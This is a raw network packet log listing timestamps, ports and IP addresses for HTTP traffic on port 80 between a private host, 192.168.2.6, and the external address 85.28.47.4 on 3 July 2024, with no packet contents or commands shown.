Jul 3, 2024 18:08:24.344674110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.344681978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.344721079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.345519066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.345577955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.345581055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.345588923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.345616102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.345627069 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.345659018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.346470118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.346518040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.346529007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.346530914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.346565962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.346584082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.346615076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.347382069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.347429037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.347441912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.347453117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.347476006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.347495079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.347524881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.348931074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.348941088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.348952055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.348969936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.348988056 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.349018097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.349389076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.349400043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.349431992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.349452972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.349467039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.349474907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.349515915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.350264072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.350325108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.350337982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.350348949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.350358963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.350383997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.350411892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.351210117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.351228952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.351288080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.351300955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.396334887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.396359921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.396369934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.396425962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.396469116 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.396475077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.396513939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.396537066 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.396555901 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.404723883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.404767990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.404778004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.404824018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.404830933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.404843092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.404856920 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.404891014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.408584118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.408684969 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.408710957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.408721924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.408731937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.408741951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.408752918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.408757925 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.408782005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.408814907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.408847094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.408888102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.408901930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.408911943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.408945084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.408999920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409012079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409041882 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.409070015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.409236908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409292936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.409322023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409332991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409379005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.409382105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409394026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409404039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409414053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409425974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.409455061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.409562111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409615040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.409806013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409847975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.409853935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409863949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.409894943 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.409907103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.414082050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414118052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414127111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414129972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.414155006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.414167881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.414268970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414279938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414289951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414319038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.414335966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.414387941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414398909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414403915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414410114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414455891 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.414511919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414522886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414531946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414541960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414549112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.414551020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.414576054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.414594889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.415206909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415225983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415235996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415261030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.415283918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.415290117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415299892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415352106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.415669918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415679932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415685892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415724039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415725946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.415735006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415745020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415755987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.415757895 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.415782928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.415798903 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.416011095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416021109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416030884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416043043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416054010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416060925 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.416081905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.416096926 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.416579008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416589975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416599989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416631937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.416646957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.416719913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416731119 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416747093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416757107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416764021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.416768074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416774035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416784048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416794062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.416795015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416806936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.416819096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.416881084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.417536020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417546034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417551994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417598009 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.417608023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417618990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417628050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417634010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417654037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.417666912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417682886 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.417711020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.417732000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417748928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417758942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417768955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.417771101 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.417794943 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.417819023 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.418472052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.418482065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.418493986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.418520927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.418673038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.418683052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.418705940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.418715000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.418740988 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.484909058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.484921932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.484932899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.484960079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.484971046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.485045910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.485058069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.485057116 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.485079050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.485095024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.485122919 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.485275984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.485304117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.485333920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.485335112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.485335112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.485357046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.485387087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.493396997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493432045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493442059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493458986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.493477106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.493673086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493681908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493693113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493721962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493731976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493733883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.493741989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493762016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.493772984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493788958 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.493814945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.493972063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.493982077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.494025946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.494045019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.497482061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497493029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497503996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497555017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.497587919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497597933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497602940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497612953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497617960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497642994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.497658968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.497766972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497777939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497786999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497795105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497805119 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.497833967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.497930050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497946978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497956991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497962952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.497991085 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.498013020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.498111010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498121023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498131037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498136044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498146057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498156071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498157978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.498167038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498172045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498183012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498200893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.498234987 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.498486042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498497009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498506069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498516083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498526096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498537064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498537064 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.498554945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.498585939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.498894930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498905897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498917103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498928070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.498950005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.498977900 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.502762079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.502816916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.502839088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.502850056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.502886057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.502902031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.502914906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.502924919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.502933979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.502943039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.502949953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.502966881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.502981901 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503086090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503098011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503107071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503112078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503122091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503134012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503160000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503165007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503200054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503202915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503211021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503254890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503314018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503324032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503333092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503343105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503350973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503381014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503402948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503416061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503454924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503479004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503520966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503554106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503563881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503572941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503597021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503609896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503623962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503657103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.503674030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.503684044 CEST	80	49710	85.28.47.4	192.168.2.6
